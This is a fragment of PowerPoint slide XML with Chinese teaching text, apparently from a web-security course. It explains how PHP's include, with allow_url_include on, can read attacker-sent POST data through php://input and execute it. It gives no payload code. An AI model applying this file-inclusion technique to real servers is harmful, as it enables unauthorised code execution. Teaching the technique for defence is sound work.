                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>allow_url_include</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同时开启的情况下，</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>include</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等函数支持从</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>PHP</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伪协议中的</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>php://input</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处获取输入流</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，关于</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PHP</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伪协议的相关知识会在下一小节中讨论，这里只关注其中的</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php://input</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>。</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>php</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>://input</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>可以访问请求的原始数据的只读流，也就是通过</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>POST</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>方式发送的内容。</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>借助</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>PHP</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>伪协议，攻击者直接将想要在服务器上执行的恶意代码通过</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>POST</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>的方式发送给服务器就能完成攻击</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a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="16" name="直接连接符 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{08F568E1-C033-4281-9595-DBB80C9FE131}"/>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7" name="programming_69045">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{53C58D8B-6E9B-436B-99E8-DD7B003CE6D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2666029" y="5289839"/>
              <a:ext cx="609685" cy="525258"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 367955 w 607427"/>
                <a:gd name="connsiteY0" fmla="*/ 139084 h 523313"/>
                <a:gd name="connsiteX1" fmla="*/ 375457 w 607427"/>
                <a:gd name="connsiteY1" fmla="*/ 140737 h 523313"/>
                <a:gd name="connsiteX2" fmla="*/ 468235 w 607427"/>
                <a:gd name="connsiteY2" fmla="*/ 183823 h 523313"/>
                <a:gd name="connsiteX3" fmla="*/ 478715 w 607427"/>
                <a:gd name="connsiteY3" fmla="*/ 200132 h 523313"/>
                <a:gd name="connsiteX4" fmla="*/ 478715 w 607427"/>
                <a:gd name="connsiteY4" fmla="*/ 201455 h 523313"/>
                <a:gd name="connsiteX5" fmla="*/ 468235 w 607427"/>
                <a:gd name="connsiteY5" fmla="*/ 217764 h 523313"/>
                <a:gd name="connsiteX6" fmla="*/ 375457 w 607427"/>
                <a:gd name="connsiteY6" fmla="*/ 260850 h 523313"/>
                <a:gd name="connsiteX7" fmla="*/ 367845 w 607427"/>
                <a:gd name="connsiteY7" fmla="*/ 262503 h 523313"/>
                <a:gd name="connsiteX8" fmla="*/ 358247 w 607427"/>
                <a:gd name="connsiteY8" fmla="*/ 259748 h 523313"/>
                <a:gd name="connsiteX9" fmla="*/ 349863 w 607427"/>
                <a:gd name="connsiteY9" fmla="*/ 244541 h 523313"/>
                <a:gd name="connsiteX10" fmla="*/ 349863 w 607427"/>
                <a:gd name="connsiteY10" fmla="*/ 244100 h 523313"/>
                <a:gd name="connsiteX11" fmla="*/ 360344 w 607427"/>
                <a:gd name="connsiteY11" fmla="*/ 227681 h 523313"/>
                <a:gd name="connsiteX12" fmla="*/ 418371 w 607427"/>
                <a:gd name="connsiteY12" fmla="*/ 200793 h 523313"/>
                <a:gd name="connsiteX13" fmla="*/ 360344 w 607427"/>
                <a:gd name="connsiteY13" fmla="*/ 173906 h 523313"/>
                <a:gd name="connsiteX14" fmla="*/ 349863 w 607427"/>
                <a:gd name="connsiteY14" fmla="*/ 157487 h 523313"/>
                <a:gd name="connsiteX15" fmla="*/ 349863 w 607427"/>
                <a:gd name="connsiteY15" fmla="*/ 157046 h 523313"/>
                <a:gd name="connsiteX16" fmla="*/ 358247 w 607427"/>
                <a:gd name="connsiteY16" fmla="*/ 141839 h 523313"/>
                <a:gd name="connsiteX17" fmla="*/ 367955 w 607427"/>
                <a:gd name="connsiteY17" fmla="*/ 139084 h 523313"/>
                <a:gd name="connsiteX18" fmla="*/ 239471 w 607427"/>
                <a:gd name="connsiteY18" fmla="*/ 139084 h 523313"/>
                <a:gd name="connsiteX19" fmla="*/ 249179 w 607427"/>
                <a:gd name="connsiteY19" fmla="*/ 141839 h 523313"/>
                <a:gd name="connsiteX20" fmla="*/ 257563 w 607427"/>
                <a:gd name="connsiteY20" fmla="*/ 157046 h 523313"/>
                <a:gd name="connsiteX21" fmla="*/ 257563 w 607427"/>
                <a:gd name="connsiteY21" fmla="*/ 157487 h 523313"/>
                <a:gd name="connsiteX22" fmla="*/ 247082 w 607427"/>
                <a:gd name="connsiteY22" fmla="*/ 173906 h 523313"/>
                <a:gd name="connsiteX23" fmla="*/ 189055 w 607427"/>
                <a:gd name="connsiteY23" fmla="*/ 200793 h 523313"/>
                <a:gd name="connsiteX24" fmla="*/ 247082 w 607427"/>
                <a:gd name="connsiteY24" fmla="*/ 227681 h 523313"/>
                <a:gd name="connsiteX25" fmla="*/ 257563 w 607427"/>
                <a:gd name="connsiteY25" fmla="*/ 244100 h 523313"/>
                <a:gd name="connsiteX26" fmla="*/ 257563 w 607427"/>
                <a:gd name="connsiteY26" fmla="*/ 244541 h 523313"/>
                <a:gd name="connsiteX27" fmla="*/ 249179 w 607427"/>
                <a:gd name="connsiteY27" fmla="*/ 259748 h 523313"/>
                <a:gd name="connsiteX28" fmla="*/ 239471 w 607427"/>
                <a:gd name="connsiteY28" fmla="*/ 262503 h 523313"/>
                <a:gd name="connsiteX29" fmla="*/ 231859 w 607427"/>
                <a:gd name="connsiteY29" fmla="*/ 260850 h 523313"/>
                <a:gd name="connsiteX30" fmla="*/ 139081 w 607427"/>
                <a:gd name="connsiteY30" fmla="*/ 217764 h 523313"/>
                <a:gd name="connsiteX31" fmla="*/ 128711 w 607427"/>
                <a:gd name="connsiteY31" fmla="*/ 201455 h 523313"/>
                <a:gd name="connsiteX32" fmla="*/ 128711 w 607427"/>
                <a:gd name="connsiteY32" fmla="*/ 200132 h 523313"/>
                <a:gd name="connsiteX33" fmla="*/ 139081 w 607427"/>
                <a:gd name="connsiteY33" fmla="*/ 183823 h 523313"/>
                <a:gd name="connsiteX34" fmla="*/ 231859 w 607427"/>
                <a:gd name="connsiteY34" fmla="*/ 140737 h 523313"/>
                <a:gd name="connsiteX35" fmla="*/ 239471 w 607427"/>
                <a:gd name="connsiteY35" fmla="*/ 139084 h 523313"/>
                <a:gd name="connsiteX36" fmla="*/ 333983 w 607427"/>
                <a:gd name="connsiteY36" fmla="*/ 87783 h 523313"/>
                <a:gd name="connsiteX37" fmla="*/ 334424 w 607427"/>
                <a:gd name="connsiteY37" fmla="*/ 87783 h 523313"/>
                <a:gd name="connsiteX38" fmla="*/ 348980 w 607427"/>
                <a:gd name="connsiteY38" fmla="*/ 95162 h 523313"/>
                <a:gd name="connsiteX39" fmla="*/ 351627 w 607427"/>
                <a:gd name="connsiteY39" fmla="*/ 111351 h 523313"/>
                <a:gd name="connsiteX40" fmla="*/ 290535 w 607427"/>
                <a:gd name="connsiteY40" fmla="*/ 300332 h 523313"/>
                <a:gd name="connsiteX41" fmla="*/ 273333 w 607427"/>
                <a:gd name="connsiteY41" fmla="*/ 312887 h 523313"/>
                <a:gd name="connsiteX42" fmla="*/ 272891 w 607427"/>
                <a:gd name="connsiteY42" fmla="*/ 312887 h 523313"/>
                <a:gd name="connsiteX43" fmla="*/ 258335 w 607427"/>
                <a:gd name="connsiteY43" fmla="*/ 305508 h 523313"/>
                <a:gd name="connsiteX44" fmla="*/ 255689 w 607427"/>
                <a:gd name="connsiteY44" fmla="*/ 289429 h 523313"/>
                <a:gd name="connsiteX45" fmla="*/ 316890 w 607427"/>
                <a:gd name="connsiteY45" fmla="*/ 100338 h 523313"/>
                <a:gd name="connsiteX46" fmla="*/ 333983 w 607427"/>
                <a:gd name="connsiteY46" fmla="*/ 87783 h 523313"/>
                <a:gd name="connsiteX47" fmla="*/ 44120 w 607427"/>
                <a:gd name="connsiteY47" fmla="*/ 44059 h 523313"/>
                <a:gd name="connsiteX48" fmla="*/ 44120 w 607427"/>
                <a:gd name="connsiteY48" fmla="*/ 358311 h 523313"/>
                <a:gd name="connsiteX49" fmla="*/ 563307 w 607427"/>
                <a:gd name="connsiteY49" fmla="*/ 358311 h 523313"/>
                <a:gd name="connsiteX50" fmla="*/ 563307 w 607427"/>
                <a:gd name="connsiteY50" fmla="*/ 44059 h 523313"/>
                <a:gd name="connsiteX51" fmla="*/ 29450 w 607427"/>
                <a:gd name="connsiteY51" fmla="*/ 0 h 523313"/>
                <a:gd name="connsiteX52" fmla="*/ 577977 w 607427"/>
                <a:gd name="connsiteY52" fmla="*/ 0 h 523313"/>
                <a:gd name="connsiteX53" fmla="*/ 607427 w 607427"/>
                <a:gd name="connsiteY53" fmla="*/ 29410 h 523313"/>
                <a:gd name="connsiteX54" fmla="*/ 607427 w 607427"/>
                <a:gd name="connsiteY54" fmla="*/ 373071 h 523313"/>
                <a:gd name="connsiteX55" fmla="*/ 577977 w 607427"/>
                <a:gd name="connsiteY55" fmla="*/ 402371 h 523313"/>
                <a:gd name="connsiteX56" fmla="*/ 372817 w 607427"/>
                <a:gd name="connsiteY56" fmla="*/ 402371 h 523313"/>
                <a:gd name="connsiteX57" fmla="*/ 372817 w 607427"/>
                <a:gd name="connsiteY57" fmla="*/ 468900 h 523313"/>
                <a:gd name="connsiteX58" fmla="*/ 452675 w 607427"/>
                <a:gd name="connsiteY58" fmla="*/ 468900 h 523313"/>
                <a:gd name="connsiteX59" fmla="*/ 479809 w 607427"/>
                <a:gd name="connsiteY59" fmla="*/ 496106 h 523313"/>
                <a:gd name="connsiteX60" fmla="*/ 452675 w 607427"/>
                <a:gd name="connsiteY60" fmla="*/ 523313 h 523313"/>
                <a:gd name="connsiteX61" fmla="*/ 154752 w 607427"/>
                <a:gd name="connsiteY61" fmla="*/ 523313 h 523313"/>
                <a:gd name="connsiteX62" fmla="*/ 127508 w 607427"/>
                <a:gd name="connsiteY62" fmla="*/ 496106 h 523313"/>
                <a:gd name="connsiteX63" fmla="*/ 154752 w 607427"/>
                <a:gd name="connsiteY63" fmla="*/ 468900 h 523313"/>
                <a:gd name="connsiteX64" fmla="*/ 234610 w 607427"/>
                <a:gd name="connsiteY64" fmla="*/ 468900 h 523313"/>
                <a:gd name="connsiteX65" fmla="*/ 234610 w 607427"/>
                <a:gd name="connsiteY65" fmla="*/ 402371 h 523313"/>
                <a:gd name="connsiteX66" fmla="*/ 29450 w 607427"/>
                <a:gd name="connsiteY66" fmla="*/ 402371 h 523313"/>
                <a:gd name="connsiteX67" fmla="*/ 0 w 607427"/>
                <a:gd name="connsiteY67" fmla="*/ 373071 h 523313"/>
                <a:gd name="connsiteX68" fmla="*/ 0 w 607427"/>
                <a:gd name="connsiteY68" fmla="*/ 29410 h 523313"/>
                <a:gd name="connsiteX69" fmla="*/ 29450 w 607427"/>
                <a:gd name="connsiteY69" fmla="*/ 0 h 523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607427" h="523313">
                  <a:moveTo>
                    <a:pt x="367955" y="139084"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="370493" y="139084"/>
                    <a:pt x="373140" y="139635"/>
                    <a:pt x="375457" y="140737"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="468235" y="183823"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="474633" y="186799"/>
                    <a:pt x="478715" y="193190"/>
                    <a:pt x="478715" y="200132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="478715" y="201455"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="478715" y="208397"/>
                    <a:pt x="474633" y="214788"/>
                    <a:pt x="468235" y="217764"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="375457" y="260850"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="373030" y="261952"/>
                    <a:pt x="370493" y="262503"/>
                    <a:pt x="367845" y="262503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364425" y="262503"/>
                    <a:pt x="361116" y="261621"/>
                    <a:pt x="358247" y="259748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352952" y="256442"/>
                    <a:pt x="349863" y="250712"/>
                    <a:pt x="349863" y="244541"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="349863" y="244100"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="349863" y="237048"/>
                    <a:pt x="353945" y="230656"/>
                    <a:pt x="360344" y="227681"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="418371" y="200793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="360344" y="173906"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="353945" y="170931"/>
                    <a:pt x="349863" y="164539"/>
                    <a:pt x="349863" y="157487"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="349863" y="157046"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="349863" y="150875"/>
                    <a:pt x="352952" y="145145"/>
                    <a:pt x="358247" y="141839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361116" y="140076"/>
                    <a:pt x="364425" y="139084"/>
                    <a:pt x="367955" y="139084"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="239471" y="139084"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="243001" y="139084"/>
                    <a:pt x="246310" y="140076"/>
                    <a:pt x="249179" y="141839"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254364" y="145145"/>
                    <a:pt x="257563" y="150875"/>
                    <a:pt x="257563" y="157046"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="257563" y="157487"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="257563" y="164539"/>
                    <a:pt x="253481" y="170931"/>
                    <a:pt x="247082" y="173906"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="189055" y="200793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247082" y="227681"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="253481" y="230656"/>
                    <a:pt x="257563" y="237048"/>
                    <a:pt x="257563" y="244100"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="257563" y="244541"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="257563" y="250712"/>
                    <a:pt x="254364" y="256442"/>
                    <a:pt x="249179" y="259748"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246310" y="261621"/>
                    <a:pt x="242890" y="262503"/>
                    <a:pt x="239471" y="262503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="236823" y="262503"/>
                    <a:pt x="234286" y="261952"/>
                    <a:pt x="231859" y="260850"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139081" y="217764"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="132793" y="214788"/>
                    <a:pt x="128711" y="208397"/>
                    <a:pt x="128711" y="201455"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="128711" y="200132"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="128711" y="193190"/>
                    <a:pt x="132793" y="186799"/>
                    <a:pt x="139081" y="183823"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="231859" y="140737"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="234286" y="139635"/>
                    <a:pt x="236823" y="139084"/>
                    <a:pt x="239471" y="139084"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="333983" y="87783"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="334424" y="87783"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="340158" y="87783"/>
                    <a:pt x="345672" y="90536"/>
                    <a:pt x="348980" y="95162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352399" y="99787"/>
                    <a:pt x="353391" y="105844"/>
                    <a:pt x="351627" y="111351"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="290535" y="300332"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="288109" y="307821"/>
                    <a:pt x="281272" y="312887"/>
                    <a:pt x="273333" y="312887"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="272891" y="312887"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="267157" y="312887"/>
                    <a:pt x="261754" y="310134"/>
                    <a:pt x="258335" y="305508"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255027" y="300883"/>
                    <a:pt x="254035" y="294826"/>
                    <a:pt x="255689" y="289429"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="316890" y="100338"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="319206" y="92849"/>
                    <a:pt x="326153" y="87783"/>
                    <a:pt x="333983" y="87783"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="44120" y="44059"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="44120" y="358311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563307" y="358311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563307" y="44059"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="29450" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="577977" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="594191" y="0"/>
                    <a:pt x="607427" y="13108"/>
                    <a:pt x="607427" y="29410"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="607427" y="373071"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="607427" y="389263"/>
                    <a:pt x="594191" y="402371"/>
                    <a:pt x="577977" y="402371"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="372817" y="402371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372817" y="468900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="452675" y="468900"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="467676" y="468900"/>
                    <a:pt x="479809" y="481126"/>
                    <a:pt x="479809" y="496106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="479809" y="511087"/>
                    <a:pt x="467676" y="523313"/>
                    <a:pt x="452675" y="523313"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="154752" y="523313"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139751" y="523313"/>
                    <a:pt x="127508" y="511087"/>
                    <a:pt x="127508" y="496106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127508" y="481126"/>
                    <a:pt x="139751" y="468900"/>
                    <a:pt x="154752" y="468900"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="234610" y="468900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234610" y="402371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29450" y="402371"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13126" y="402371"/>
                    <a:pt x="0" y="389263"/>
                    <a:pt x="0" y="373071"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="29410"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="13108"/>
                    <a:pt x="13126" y="0"/>
                    <a:pt x="29450" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1ADC3C7D-62EC-4A34-BAC2-FC3079CA6BD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1028775" y="512643"/>
            <a:ext cx="11089232" cy="2308324"/>
            <a:chOff x="2360923" y="2264994"/>
            <a:chExt cx="11089232" cy="2308324"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{0FF61773-890E-4F02-8444-4951548776D9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2360923" y="2264994"/>
              <a:ext cx="11089232" cy="2308324"/>
              <a:chOff x="4933525" y="1917926"/>
              <a:chExt cx="11089232" cy="2308324"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="六边形 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{37BBE9B3-C065-42AE-8B27-A0C566CA0DAA}"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="文本框 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{694F9DF9-8E30-48E5-9FD4-63A66508B2F5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6984268" y="1917926"/>
                <a:ext cx="9038489"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marL="457200" indent="-457200">
                  <a:buAutoNum type="arabicPeriod"/>
                </a:pPr>
                <a:r>
